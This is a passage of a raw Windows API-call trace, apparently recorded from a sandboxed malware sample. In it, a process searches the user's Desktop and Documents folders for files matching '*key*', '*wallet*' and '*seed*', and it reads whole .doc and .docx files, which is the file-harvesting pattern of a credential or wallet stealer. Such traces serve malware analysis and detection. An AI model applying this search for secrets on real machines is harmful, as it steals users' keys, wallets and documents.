lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c3890, ftCreationTime.dwHighDateTime=0x1d7dc03, ftLastAccessTime.dwLowDateTime=0xdc52f260, ftLastAccessTime.dwHighDateTime=0x1d7de5c, ftLastWriteTime.dwLowDateTime=0xdc52f260, ftLastWriteTime.dwHighDateTime=0x1d7de5c, nFileSizeHigh=0x0, nFileSizeLow=0xc95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CduSDavY.doc", cAlternateFileName="")) returned 1 [0232.339] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0232.339] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0232.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.339] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.340] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*key*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.340] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.340] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*wallet*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.340] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.341] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*seed*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.343] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0232.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\1by5mtkczanr.docx"), fInfoLevelId=0x0, lpFileInformation=0x26b9fe0 | out: lpFileInformation=0x26b9fe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e59610, ftCreationTime.dwHighDateTime=0x1d7ddca, ftLastAccessTime.dwLowDateTime=0x99168d70, ftLastAccessTime.dwHighDateTime=0x1d7e2e1, ftLastWriteTime.dwLowDateTime=0x99168d70, ftLastWriteTime.dwHighDateTime=0x1d7e2e1, nFileSizeHigh=0x0, nFileSizeLow=0xcfd0)) returned 1 [0232.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.343] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.348] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0232.357] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0232.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.357] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\1by5mtkczanr.docx"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3e59610, ftCreationTime.dwHighDateTime=0x1d7ddca, ftLastAccessTime.dwLowDateTime=0x99168d70, ftLastAccessTime.dwHighDateTime=0x1d7e2e1, ftLastWriteTime.dwLowDateTime=0x99168d70, ftLastWriteTime.dwHighDateTime=0x1d7e2e1, nFileSizeHigh=0x0, nFileSizeLow=0xcfd0)) returned 1 [0232.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.358] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx", lpFilePart=0x0) returned 0x2c [0232.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.358] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\1BY5mTkcZANR.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\1by5mtkczanr.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.358] GetFileType (hFile=0x614) returned 0x1 [0232.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.358] GetFileType (hFile=0x614) returned 0x1 [0232.409] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.410] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.410] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.411] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.411] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.412] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.412] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.412] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.412] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.413] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.413] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.413] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.414] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0xfd0, lpOverlapped=0x0) returned 1 [0232.414] ReadFile (in: hFile=0x614, lpBuffer=0x26bac0c, nNumberOfBytesToRead=0x30, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bac0c*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.414] ReadFile (in: hFile=0x614, lpBuffer=0x26bb4a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26bb4a8*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.417] CloseHandle (hObject=0x614) returned 1 [0232.417] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0232.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.417] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\cdusdavy.doc"), fInfoLevelId=0x0, lpFileInformation=0x26e55c0 | out: lpFileInformation=0x26e55c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c3890, ftCreationTime.dwHighDateTime=0x1d7dc03, ftLastAccessTime.dwLowDateTime=0xdc52f260, ftLastAccessTime.dwHighDateTime=0x1d7de5c, ftLastWriteTime.dwLowDateTime=0xdc52f260, ftLastWriteTime.dwHighDateTime=0x1d7de5c, nFileSizeHigh=0x0, nFileSizeLow=0xc95c)) returned 1 [0232.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.417] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0232.417] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0232.417] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0232.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.417] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\cdusdavy.doc"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a2c3890, ftCreationTime.dwHighDateTime=0x1d7dc03, ftLastAccessTime.dwLowDateTime=0xdc52f260, ftLastAccessTime.dwHighDateTime=0x1d7de5c, ftLastWriteTime.dwLowDateTime=0xdc52f260, ftLastWriteTime.dwHighDateTime=0x1d7de5c, nFileSizeHigh=0x0, nFileSizeLow=0xc95c)) returned 1 [0232.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.418] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc", lpFilePart=0x0) returned 0x27 [0232.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.418] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\CduSDavY.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\cdusdavy.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.418] GetFileType (hFile=0x614) returned 0x1 [0232.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.418] GetFileType (hFile=0x614) returned 0x1 [0232.418] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.419] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.420] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.420] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.420] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.421] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.421] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.421] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.422] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.422] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.422] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.422] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.423] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x95c, lpOverlapped=0x0) returned 1 [0232.423] ReadFile (in: hFile=0x614, lpBuffer=0x26e5d00, nNumberOfBytesToRead=0x2a4, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e5d00*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.423] ReadFile (in: hFile=0x614, lpBuffer=0x26e6810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x26e6810*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.426] CloseHandle (hObject=0x614) returned 1 [0232.426] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0232.427] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents", lpDst=0x38ef7c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents") returned 0x1d [0232.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.427] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.427] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.txt", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.428] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.428] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.doc*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98248080, ftCreationTime.dwHighDateTime=0x1d7c15c, ftLastAccessTime.dwLowDateTime=0x521f6df0, ftLastAccessTime.dwHighDateTime=0x1d7d00e, ftLastWriteTime.dwLowDateTime=0x521f6df0, ftLastWriteTime.dwHighDateTime=0x1d7d00e, nFileSizeHigh=0x0, nFileSizeLow=0x14411, dwReserved0=0x0, dwReserved1=0x0, cFileName="7VZCVQe.docx", cAlternateFileName="7VZCVQ~1.DOC")) returned 0x55b8a68 [0232.428] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5adbb80, ftCreationTime.dwHighDateTime=0x1d77dc0, ftLastAccessTime.dwLowDateTime=0x8ad8cd60, ftLastAccessTime.dwHighDateTime=0x1d7d5b5, ftLastWriteTime.dwLowDateTime=0x8ad8cd60, ftLastWriteTime.dwHighDateTime=0x1d7d5b5, nFileSizeHigh=0x0, nFileSizeLow=0x13a69, dwReserved0=0x0, dwReserved1=0x0, cFileName="IvDexdy_r Oq.docx", cAlternateFileName="IVDEXD~1.DOC")) returned 1 [0232.428] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3538e2e0, ftCreationTime.dwHighDateTime=0x1d769fa, ftLastAccessTime.dwLowDateTime=0x6803aeb0, ftLastAccessTime.dwHighDateTime=0x1d7b218, ftLastWriteTime.dwLowDateTime=0x6803aeb0, ftLastWriteTime.dwHighDateTime=0x1d7b218, nFileSizeHigh=0x0, nFileSizeLow=0xc17, dwReserved0=0x0, dwReserved1=0x0, cFileName="KangmawL.docx", cAlternateFileName="KANGMA~1.DOC")) returned 1 [0232.428] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770dc980, ftCreationTime.dwHighDateTime=0x1d7689f, ftLastAccessTime.dwLowDateTime=0x3786f610, ftLastAccessTime.dwHighDateTime=0x1d779a7, ftLastWriteTime.dwLowDateTime=0x3786f610, ftLastWriteTime.dwHighDateTime=0x1d779a7, nFileSizeHigh=0x0, nFileSizeLow=0x12cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="t6GW4d_MTgVoESu.docx", cAlternateFileName="T6GW4D~1.DOC")) returned 1 [0232.428] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fade60, ftCreationTime.dwHighDateTime=0x1d7a2dd, ftLastAccessTime.dwLowDateTime=0xd6fc5590, ftLastAccessTime.dwHighDateTime=0x1d7c4a8, ftLastWriteTime.dwLowDateTime=0xd6fc5590, ftLastWriteTime.dwHighDateTime=0x1d7c4a8, nFileSizeHigh=0x0, nFileSizeLow=0x660b, dwReserved0=0x0, dwReserved1=0x0, cFileName="W0TV7ENECKo 9vK.docx", cAlternateFileName="W0TV7E~1.DOC")) returned 1 [0232.428] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38edd8 | out: lpFindFileData=0x38edd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0232.428] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0232.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.429] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.429] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*key*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0232.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed90) returned 1 [0232.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eff0) returned 1 [0232.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38f020) returned 1 [0232.429] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.430] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*wallet*", lpFindFileData=0x38edd0 | out: lpFindFileData=0x38edd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, 